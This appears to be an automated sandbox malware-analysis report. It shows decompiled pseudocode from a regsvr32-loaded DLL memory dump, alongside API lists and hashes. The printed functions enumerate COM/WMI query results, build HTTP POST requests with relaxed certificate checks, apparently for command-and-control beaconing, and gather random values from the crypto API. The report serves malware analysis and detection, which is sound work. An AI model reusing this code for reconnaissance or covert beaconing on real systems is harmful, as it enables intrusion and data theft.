                            • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                            • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
                            • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                            • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                            • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
                            • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                            • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				void* _v28;
                            				signed int _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				signed int _v60;
                            				char* _v72;
                            				signed short _v80;
                            				signed int _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v616;
                            				intOrPtr* _t159;
                            				char _t165;
                            				signed int _t166;
                            				signed int _t173;
                            				signed int _t178;
                            				signed int _t186;
                            				intOrPtr* _t187;
                            				signed int _t188;
                            				signed int _t192;
                            				intOrPtr* _t193;
                            				intOrPtr _t200;
                            				intOrPtr* _t205;
                            				signed int _t207;
                            				signed int _t209;
                            				intOrPtr* _t210;
                            				intOrPtr _t212;
                            				intOrPtr* _t213;
                            				signed int _t214;
                            				char _t217;
                            				signed int _t218;
                            				signed int _t219;
                            				signed int _t230;
                            				signed int _t235;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				intOrPtr* _t247;
                            				intOrPtr* _t251;
                            				signed int _t252;
                            				intOrPtr* _t253;
                            				void* _t255;
                            				intOrPtr* _t261;
                            				signed int _t262;
                            				signed int _t283;
                            				signed int _t289;
                            				char* _t298;
                            				void* _t320;
                            				signed int _t322;
                            				intOrPtr* _t323;
                            				intOrPtr _t324;
                            				signed int _t327;
                            				intOrPtr* _t328;
                            				intOrPtr* _t329;
                            
                            				_v32 = _v32 & 0x00000000;
                            				_v60 = _v60 & 0x00000000;
                            				_v56 = __edx;
                            				_v100 = __ecx;
                            				_t159 = E1000D523(__ecx);
                            				_t251 = _t159;
                            				_v104 = _t251;
                            				if(_t251 == 0) {
                            					return _t159;
                            				}
                            				_t320 = E10008604(0x10);
                            				_v36 = _t320;
                            				_pop(_t255);
                            				if(_t320 == 0) {
                            					L53:
                            					E1000861A( &_v60, 0xfffffffe);
                            					E1000D5D7( &_v104);
                            					return _t320;
                            				}
                            				_t165 = E100095E1(_t255, 0x536);
                            				 *_t328 = 0x609;
                            				_v52 = _t165;
                            				_t166 = E100095E1(_t255);
                            				_push(0);
                            				_push(_v56);
                            				_v20 = _t166;
                            				_push(_t166);
                            				_push(_a4);
                            				_t322 = E100092E5(_t165);
                            				_v60 = _t322;
                            				E100085D5( &_v52);
                            				E100085D5( &_v20);
                            				_t329 = _t328 + 0x20;
                            				if(_t322 != 0) {
                            					_t323 = __imp__#2;
                            					_v40 =  *_t323(_t322);
                            					_t173 = E100095E1(_t255, 0x9e4);
                            					_v20 = _t173;
                            					_v52 =  *_t323(_t173);
                            					E100085D5( &_v20);
                            					_t324 = _v40;
                            					_t261 =  *_t251;
                            					_t252 = 0;
                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                            					__eflags = _t178;
                            					if(_t178 != 0) {
                            						L52:
                            						__imp__#6(_t324);
                            						__imp__#6(_v52);
                            						goto L53;
                            					}
                            					_t262 = _v32;
                            					_v28 = 0;
                            					_v20 = 0;
                            					__eflags = _t262;
                            					if(_t262 == 0) {
                            						L49:
                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                            						__eflags = _t252;
                            						if(_t252 == 0) {
                            							E1000861A( &_v36, 0);
                            							_t320 = _v36;
                            						} else {
                            							 *(_t320 + 8) = _t252;
                            							 *_t320 = E100091E3(_v100);
                            							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                            						}
                            						goto L52;
                            					} else {
                            						goto L6;
                            					}
                            					while(1) {
                            						L6:
                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                            						__eflags = _t186;
                            						if(_t186 != 0) {
                            							break;
                            						}
                            						_v16 = 0;
                            						_v48 = 0;
                            						_v12 = 0;
                            						_v24 = 0;
                            						__eflags = _v84;
                            						if(_v84 == 0) {
                            							break;
                            						}
                            						_t187 = _v28;
                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                            						__eflags = _t188;
                            						if(_t188 >= 0) {
                            							__imp__#20(_v24, 1,  &_v16);
                            							__imp__#19(_v24, 1,  &_v48);
                            							_t46 = _t320 + 0xc; // 0xc
                            							_t253 = _t46;
                            							_t327 = _t252 << 3;
                            							_t47 = _t327 + 8; // 0x8
                            							_t192 = E10008698(_t327, _t47);
                            							__eflags = _t192;
                            							if(_t192 == 0) {
                            								__imp__#16(_v24);
                            								_t193 = _v28;
                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                            								L46:
                            								_t252 = _v20;
                            								break;
                            							}
                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                            							_t200 =  *_t253;
                            							__eflags =  *(_t327 + _t200 + 4);
                            							if( *(_t327 + _t200 + 4) == 0) {
                            								_t136 = _t320 + 0xc; // 0xc
                            								E1000861A(_t136, 0);
                            								E1000861A( &_v36, 0);
                            								__imp__#16(_v24);
                            								_t205 = _v28;
                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                            								_t320 = _v36;
                            								goto L46;
                            							}
                            							_t207 = _v16;
                            							while(1) {
                            								_v12 = _t207;
                            								__eflags = _t207 - _v48;
                            								if(_t207 > _v48) {
                            									break;
                            								}
                            								_v44 = _v44 & 0x00000000;
                            								_t209 =  &_v12;
                            								__imp__#25(_v24, _t209,  &_v44);
                            								__eflags = _t209;
                            								if(_t209 < 0) {
                            									break;
                            								}
                            								_t212 = E100091E3(_v44);
                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                            								_t213 = _v28;
                            								_t281 =  *_t213;
                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                            								__eflags = _t214;
                            								if(_t214 < 0) {
                            									L39:
                            									__imp__#6(_v44);
                            									_t207 = _v12 + 1;
                            									__eflags = _t207;
                            									continue;
                            								}
                            								_v92 = E100095E1(_t281, 0x250);
                            								 *_t329 = 0x4cc;
                            								_t217 = E100095E1(_t281);
                            								_t283 = _v80;
                            								_v96 = _t217;
                            								_t218 = _t283 & 0x0000ffff;
                            								__eflags = _t218 - 0xb;
                            								if(__eflags > 0) {
                            									_t219 = _t218 - 0x10;
                            									__eflags = _t219;
                            									if(_t219 == 0) {
                            										L35:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											L38:
                            											E100085D5( &_v92);
                            											E100085D5( &_v96);
                            											__imp__#9( &_v80);
                            											goto L39;
                            										}
                            										_push(_v72);
                            										_push(L"%d");
                            										L37:
                            										_push(0xc);
                            										_push(_t289);
                            										E10009640();
                            										_t329 = _t329 + 0x10;
                            										goto L38;
                            									}
                            									_t230 = _t219 - 1;
                            									__eflags = _t230;
                            									if(_t230 == 0) {
                            										L33:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											goto L38;
                            										}
                            										_push(_v72);
                            										_push(L"%u");
                            										goto L37;
                            									}
                            									_t235 = _t230 - 1;
                            									__eflags = _t235;
                            									if(_t235 == 0) {
                            										goto L33;
                            									}
                            									__eflags = _t235 == 1;
                            									if(_t235 == 1) {
                            										goto L33;
                            									}
                            									L28:
                            									__eflags = _t283 & 0x00002000;
                            									if((_t283 & 0x00002000) == 0) {
                            										_v88 = E100095E1(_t283, 0x219);
                            										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                            										E100085D5( &_v88);
                            										_t329 = _t329 + 0x18;
                            										_t298 =  &_v616;
                            										L31:
                            										_t242 = E100091E3(_t298);
                            										L32:
                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                            										goto L38;
                            									}
                            									_t242 = E1000DA20( &_v80);
                            									goto L32;
                            								}
                            								if(__eflags == 0) {
                            									__eflags = _v72 - 0xffff;
                            									_t298 = L"TRUE";
                            									if(_v72 != 0xffff) {
                            										_t298 = L"FALSE";
                            									}
                            									goto L31;
                            								}
                            								_t243 = _t218 - 1;
                            								__eflags = _t243;
                            								if(_t243 == 0) {
                            									goto L38;
                            								}
                            								_t244 = _t243 - 1;
                            								__eflags = _t244;
                            								if(_t244 == 0) {
                            									goto L35;
                            								}
                            								_t245 = _t244 - 1;
                            								__eflags = _t245;
                            								if(_t245 == 0) {
                            									goto L35;
                            								}
                            								__eflags = _t245 != 5;
                            								if(_t245 != 5) {
                            									goto L28;
                            								}
                            								_t298 = _v72;
                            								goto L31;
                            							}
                            							__imp__#16(_v24);
                            							_t210 = _v28;
                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                            							_t252 = _v20;
                            							L42:
                            							_t262 = _v32;
                            							_t252 = _t252 + 1;
                            							_v20 = _t252;
                            							__eflags = _t262;
                            							if(_t262 != 0) {
                            								continue;
                            							}
                            							L48:
                            							_t324 = _v40;
                            							goto L49;
                            						}
                            						_t247 = _v28;
                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                            						goto L42;
                            					}
                            					_t262 = _v32;
                            					goto L48;
                            				} else {
                            					E1000861A( &_v36, _t322);
                            					_t320 = _v36;
                            					goto L53;
                            				}
                            			}

                            0x1000dce8
                            0x1000dcec
                            0x1000dcee
                            0x1000dcf3
                            0x1000df02
                            0x1000df08
                            0x1000df13
                            0x1000df1e
                            0x1000df24
                            0x1000df2a
                            0x1000df2d
                            0x00000000
                            0x1000df2d
                            0x1000dcf9
                            0x1000ded0
                            0x1000ded0
                            0x1000ded3
                            0x1000ded6
                            0x00000000
                            0x00000000
                            0x1000dd01
                            0x1000dd09
                            0x1000dd10
                            0x1000dd16
                            0x1000dd18
                            0x00000000
                            0x00000000
                            0x1000dd21
                            0x1000dd36
                            0x1000dd3c
                            0x1000dd45
                            0x1000dd48
                            0x1000dd4b
                            0x1000dd4d
                            0x1000dec3
                            0x1000dec6
                            0x1000decf
                            0x1000decf
                            0x00000000
                            0x1000decf
                            0x1000dd5d
                            0x1000dd60
                            0x1000dd67
                            0x1000dd6d
                            0x1000dd70
                            0x1000dd73
                            0x1000dd76
                            0x1000dd79
                            0x1000ddb5
                            0x1000ddb5
                            0x1000ddb8
                            0x1000de64
                            0x1000de78
                            0x1000de88
                            0x1000de8c
                            0x1000de8e
                            0x1000dea5
                            0x1000dea9
                            0x1000deb2
                            0x1000debd
                            0x00000000
                            0x1000debd
                            0x1000de94
                            0x1000de95
                            0x1000de9a
                            0x1000de9a
                            0x1000de9c
                            0x1000de9d
                            0x1000dea2
                            0x00000000
                            0x1000dea2
                            0x1000ddbe
                            0x1000ddbe
                            0x1000ddc1
                            0x1000de2c
                            0x1000de40
                            0x1000de50
                            0x1000de54
                            0x1000de56
                            0x00000000
                            0x00000000
                            0x1000de5c
                            0x1000de5d
                            0x00000000
                            0x1000de5d
                            0x1000ddc3
                            0x1000ddc3
                            0x1000ddc6
                            0x00000000
                            0x00000000
                            0x1000ddc8
                            0x1000ddcb
                            0x00000000
                            0x00000000
                            0x1000ddcd
                            0x1000ddcd
                            0x1000ddd3
                            0x1000ddef
                            0x1000ddfe
                            0x1000de07
                            0x1000de0c
                            0x1000de0f
                            0x1000de15
                            0x1000de15
                            0x1000de1a
                            0x1000de26
                            0x00000000
                            0x1000de26
                            0x1000ddd8
                            0x00000000
                            0x1000ddd8
                            0x1000dd7b
                            0x1000dda2
                            0x1000dda7
                            0x1000ddac
                            0x1000ddae
                            0x1000ddae
                            0x00000000
                            0x1000ddac
                            0x1000dd7d
                            0x1000dd7d
                            0x1000dd80
                            0x00000000
                            0x00000000
                            0x1000dd86
                            0x1000dd86
                            0x1000dd89
                            0x00000000
                            0x00000000
                            0x1000dd8f
                            0x1000dd8f
                            0x1000dd92
                            0x00000000
                            0x00000000
                            0x1000dd98
                            0x1000dd9b
                            0x00000000
                            0x00000000
                            0x1000dd9d
                            0x00000000
                            0x1000dd9d
                            0x1000dedf
                            0x1000dee5
                            0x1000deeb
                            0x1000deee
                            0x1000def1
                            0x1000def1
                            0x1000def4
                            0x1000def5
                            0x1000def8
                            0x1000defa
                            0x00000000
                            0x00000000
                            0x1000df4a
                            0x1000df4a
                            0x00000000
                            0x1000df4a
                            0x1000dc81
                            0x1000dc87
                            0x00000000
                            0x1000dc87
                            0x1000df47
                            0x00000000
                            0x1000dbca
                            0x1000dbcf
                            0x1000dbd4
                            0x00000000
                            0x1000dbd8

                            APIs
                              • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                              • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                              • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                              • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                              • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                            • SysFreeString.OLEAUT32(?), ref: 1000DF82
                            • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 224402418-1412513891
                            • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                            • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                            				char _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				int _v76;
                            				void* _v80;
                            				intOrPtr _v100;
                            				int _v104;
                            				void* _v108;
                            				intOrPtr _v112;
                            				intOrPtr _v116;
                            				char* _v120;
                            				void _v124;
                            				char _v140;
                            				void _v396;
                            				void _v652;
                            				intOrPtr _t105;
                            				intOrPtr _t113;
                            				intOrPtr* _t115;
                            				intOrPtr _t118;
                            				intOrPtr _t121;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t131;
                            				char _t133;
                            				intOrPtr _t136;
                            				char _t138;
                            				char _t139;
                            				intOrPtr _t141;
                            				intOrPtr _t147;
                            				intOrPtr _t154;
                            				intOrPtr _t158;
                            				intOrPtr _t162;
                            				intOrPtr _t164;
                            				intOrPtr _t166;
                            				intOrPtr _t172;
                            				intOrPtr _t176;
                            				void* _t183;
                            				void* _t185;
                            				intOrPtr _t186;
                            				char _t195;
                            				intOrPtr _t203;
                            				intOrPtr _t204;
                            				signed int _t209;
                            				void _t212;
                            				intOrPtr _t213;
                            				void* _t214;
                            				intOrPtr _t216;
                            				char _t217;
                            				intOrPtr _t218;
                            				signed int _t219;
                            				signed int _t220;
                            				void* _t221;
                            
                            				_v40 = _v40 & 0x00000000;
                            				_v24 = 4;
                            				_v36 = 1;
                            				_t214 = __edx;
                            				memset( &_v396, 0, 0x100);
                            				memset( &_v652, 0, 0x100);
                            				_v64 = E100095C7(0x85b);
                            				_v60 = E100095C7(0xdc9);
                            				_v56 = E100095C7(0x65d);
                            				_v52 = E100095C7(0xdd3);
                            				_t105 = E100095C7(0xb74);
                            				_v44 = _v44 & 0;
                            				_t212 = 0x3c;
                            				_v48 = _t105;
                            				memset( &_v124, 0, 0x100);
                            				_v116 = 0x10;
                            				_v120 =  &_v140;
                            				_v124 = _t212;
                            				_v108 =  &_v396;
                            				_v104 = 0x100;
                            				_v80 =  &_v652;
                            				_push( &_v124);
                            				_push(0);
                            				_v76 = 0x100;
                            				_push(E1000C379(_t214));
                            				_t113 =  *0x1001e6a4; // 0x0
                            				_push(_t214);
                            				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                            					_t209 = 0;
                            					_v20 = 0;
                            					do {
                            						_t115 =  *0x1001e6a4; // 0x0
                            						_v12 = 0x8404f700;
                            						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                            						if(_t213 != 0) {
                            							_t195 = 3;
                            							_t185 = 4;
                            							_v8 = _t195;
                            							_t118 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                            							_v8 = 0x3a98;
                            							_t121 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t124 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t127 =  *0x1001e6a4; // 0x0
                            							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                            							_t131 =  *0x1001e6a4; // 0x0
                            							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                            							if(_a24 != 0) {
                            								E1000980C(_a24);
                            							}
                            							if(_t186 != 0) {
                            								_t133 = 0x8484f700;
                            								if(_v112 != 4) {
                            									_t133 = _v12;
                            								}
                            								_t136 =  *0x1001e6a4; // 0x0
                            								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                            								_v8 = _t216;
                            								if(_a24 != 0) {
                            									E1000980C(_a24);
                            								}
                            								if(_t216 != 0) {
                            									_t138 = 4;
                            									if(_v112 != _t138) {
                            										L19:
                            										_t139 = E100095C7(0x777);
                            										_t217 = _t139;
                            										_v12 = _t217;
                            										_t141 =  *0x1001e6a4; // 0x0
                            										_t218 = _v8;
                            										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                            										E100085C2( &_v12);
                            										if(_a24 != 0) {
                            											E1000980C(_a24);
                            										}
                            										if(_v28 != 0) {
                            											L28:
                            											_v24 = 8;
                            											_push(0);
                            											_v32 = 0;
                            											_v28 = 0;
                            											_push( &_v24);
                            											_push( &_v32);
                            											_t147 =  *0x1001e6a4; // 0x0
                            											_push(0x13);
                            											_push(_t218);
                            											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                            												_t219 = E10009749( &_v32);
                            												if(_t219 == 0xc8) {
                            													 *_a20 = _v8;
                            													 *_a12 = _t213;
                            													 *_a16 = _t186;
                            													return 0;
                            												}
                            												_t220 =  ~_t219;
                            												L32:
                            												_t154 =  *0x1001e6a4; // 0x0
                            												 *((intOrPtr*)(_t154 + 8))(_v8);
                            												L33:
                            												if(_t186 != 0) {
                            													_t158 =  *0x1001e6a4; // 0x0
                            													 *((intOrPtr*)(_t158 + 8))(_t186);
                            												}
                            												if(_t213 != 0) {
                            													_t203 =  *0x1001e6a4; // 0x0
                            													 *((intOrPtr*)(_t203 + 8))(_t213);
                            												}
                            												return _t220;
                            											}
                            											GetLastError();
                            											_t220 = 0xfffffff8;
                            											goto L32;
                            										} else {
                            											GetLastError();
                            											_t162 =  *0x1001e6a4; // 0x0
                            											 *((intOrPtr*)(_t162 + 8))(_t218);
                            											_t218 = 0;
                            											goto L23;
                            										}
                            									}
                            									_v12 = _t138;
                            									_push( &_v12);
                            									_push( &_v16);
                            									_t172 =  *0x1001e6a4; // 0x0
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                            										L18:
                            										GetLastError();
                            										goto L19;
                            									}
                            									_v16 = _v16 | 0x00003380;
                            									_push(4);
                            									_push( &_v16);
                            									_t176 =  *0x1001e6a4; // 0x0
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                            										goto L19;
                            									}
                            									goto L18;
                            								} else {
                            									GetLastError();
                            									L23:
                            									_t164 =  *0x1001e6a4; // 0x0
                            									 *((intOrPtr*)(_t164 + 8))(_t186);
                            									_t186 = 0;
                            									goto L24;
                            								}
                            							} else {
                            								GetLastError();
                            								L24:
                            								_t166 =  *0x1001e6a4; // 0x0
                            								 *((intOrPtr*)(_t166 + 8))(_t213);
                            								_t213 = 0;
                            								goto L25;
                            							}
                            						}
                            						GetLastError();
                            						L25:
                            						_t204 = _t218;
                            						_t209 = _v20 + 1;
                            						_v20 = _t209;
                            					} while (_t209 < 2);
                            					_v8 = _t218;
                            					if(_t204 != 0) {
                            						goto L28;
                            					}
                            					_t220 = 0xfffffffe;
                            					goto L33;
                            				}
                            				_t183 = 0xfffffffc;
                            				return _t183;
                            			}


                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                            • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E100116B8(signed int* _a4) {
                            				char _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				char _v20;
                            				_Unknown_base(*)()* _t16;
                            				_Unknown_base(*)()* _t17;
                            				void* _t22;
                            				intOrPtr* _t28;
                            				signed int _t29;
                            				signed int _t30;
                            				struct HINSTANCE__* _t32;
                            				void* _t34;
                            
                            				_t30 = 0;
                            				_v8 = 0;
                            				_t32 = GetModuleHandleA("advapi32.dll");
                            				if(_t32 == 0) {
                            					L9:
                            					return 1;
                            				}
                            				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                            				_v12 = _t16;
                            				if(_t16 == 0) {
                            					goto L9;
                            				}
                            				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                            				_v16 = _t17;
                            				if(_t17 == 0) {
                            					goto L9;
                            				}
                            				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                            				if(_t28 == 0) {
                            					goto L9;
                            				}
                            				_push(0xf0000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push( &_v8);
                            				if(_v12() == 0) {
                            					goto L9;
                            				}
                            				_t22 = _v16(_v8, 4,  &_v20);
                            				 *_t28(_v8, 0);
                            				if(_t22 == 0) {
                            					goto L9;
                            				}
                            				_t29 = 0;
                            				do {
                            					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                            					_t29 = _t29 + 1;
                            				} while (_t29 < 4);
                            				 *_a4 = _t30;
                            				return 0;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                            • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                            				signed int _t12;
                            				signed int _t13;
                            				int _t15;
                            				char* _t24;
                            				char* _t26;
                            				char* _t28;
                            				char* _t29;
                            				signed int _t40;
                            				char* _t43;
                            				char* _t45;
                            				long long* _t47;
                            
                            				_t12 = _a20;
                            				if(_t12 == 0) {
                            					_t12 = 0x11;
                            				}
                            				_t26 = _a4;
                            				_push(_t30);
                            				 *_t47 = _a12;
                            				_push(_t12);
                            				_push("%.*g");
                            				_push(_a8);
                            				_push(_t26);
                            				L10012285();
                            				_t40 = _t12;
                            				if(_t40 < 0 || _t40 >= _a8) {
                            					L19:
                            					_t13 = _t12 | 0xffffffff;
                            					goto L20;
                            				} else {
                            					L100122CD();
                            					_t15 =  *((intOrPtr*)( *_t12));
                            					if(_t15 != 0x2e) {
                            						_t24 = strchr(_t26, _t15);
                            						if(_t24 != 0) {
                            							 *_t24 = 0x2e;
                            						}
                            					}
                            					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                            						L11:
                            						_t43 = strchr(_t26, 0x65);
                            						_t28 = _t43;
                            						if(_t43 == 0) {
                            							L18:
                            							_t13 = _t40;
                            							L20:
                            							return _t13;
                            						}
                            						_t45 = _t43 + 1;
                            						_t29 = _t28 + 2;
                            						if( *_t45 == 0x2d) {
                            							_t45 = _t29;
                            						}
